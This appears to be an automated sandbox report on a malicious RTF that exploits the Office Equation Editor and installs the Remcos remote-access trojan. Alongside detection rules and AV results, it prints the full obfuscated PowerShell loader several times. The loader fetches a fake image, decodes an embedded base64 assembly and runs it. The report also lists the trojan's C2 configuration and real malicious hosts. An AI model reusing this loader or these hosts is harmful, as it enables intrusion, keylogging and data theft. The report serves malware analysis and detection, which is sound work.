Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\WQQ.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Path

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3432, TargetFilename: C:\ProgramData\WQQ.vbs

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3088, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3272, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs, ProcessId: 3432, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", CommandLine|base64offset|contain

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }", CommandLine|base64offset|contain

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1732, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs" , ProcessId: 3088, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1732, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 980, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Local\Temp\bcuddmnf.io2.ps1

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: B2 89 A0 00 89 8E 36 FF 66 06 7B 16 44 64 11 F7 21 24 93 14 B3 2A B6 C1 49 FC 66 33 F1 8D 99 AF 4D A8 32 61 8D A0 B5 49 E5 7A 75 61 D6 36 98 4C EE F6 D2 26 20 5B 78 D1 DA D4 1E 89 07 60 C7 E1 86 10 39 DC E5 C8 41 F0 6A 17 28 DA 45 08 F7 6D 82 A8 99 6E 93 35 E9 86 7D 65 8A C6 A2 55 D3 25 11 1B F3 95 53 F0 25 4B 65 73 53 85 2C 62 8E 66 6A 79 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3540, TargetObject: HKEY_CURRENT_USER\Software\Rmc-P0AEMX\exepath

Snort Signatures

ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 - Source IP: 23.95.60.75 - Destination IP: 192.168.2.22

Timestamp:	04/20/24-11:36:12.276147
SID:	2020424
Source Port:	80
Destination Port:	49165
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 - Source IP: 23.95.60.75 - Destination IP: 192.168.2.22

Timestamp:	04/20/24-11:36:12.276147
SID:	2020423
Source Port:	80
Destination Port:	49165
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf

Avira: detected

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{06BA4240-94DA-46E6-9018-D99C6787D57E}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Found malware configuration

Source: 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-P0AEMX", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: sembe.duckdns.org	Virustotal: Detection: 13%	Perma Link
Source: uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: http://23.95.60.75	Virustotal: Detection: 10%	Perma Link
Source: http://23.95.60.75/xampp/htm/IEnetworkings.htmlj	Virustotal: Detection: 10%	Perma Link
Source: sembe.duckdns.org	Virustotal: Detection: 13%	Perma Link
Source: http://23.95.60.75/144/WQDF.txt	Virustotal: Detection: 15%	Perma Link
Source: http://23.95.60.75/xampp/htm/IEnetworkings.html	Virustotal: Detection: 10%	Perma Link
Source: https://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Virustotal: Detection: 55%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3540, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\notess\logs.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00433785 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

12_2_00433785

Source: powershell.exe, 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_2b61b255-c

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3540, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 23.95.60.75 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_004074FD _wcslen,CoGetObject,

12_2_004074FD

Source: unknown

HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49162 version: TLS 1.2

Source:	Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256+ source: powershell.exe, 00000008.00000002.382499604.00000000042F9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.382499604.00000000042F9000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041C1DF FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	12_2_0041C1DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	12_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040C29B FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	12_2_0040C29B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	12_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044E739 FindFirstFileExA,	12_2_0044E739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	12_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040783C FindFirstFileW,FindNextFileW,	12_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00419A43 FindFirstFileW,FindNextFileW,FindNextFileW,	12_2_00419A43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040BA7E FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	12_2_0040BA7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040BC85 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	12_2_0040BC85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

12_2_00407C97

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03660533 ShellExecuteW,ExitProcess,	2_2_03660533
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0366047A LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_0366047A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03660505 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03660505
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036603EA URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036603EA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03660494 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03660494
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0366051E ShellExecuteW,ExitProcess,	2_2_0366051E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03660558 ExitProcess,	2_2_03660558

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: uploaddeimagens.com.br
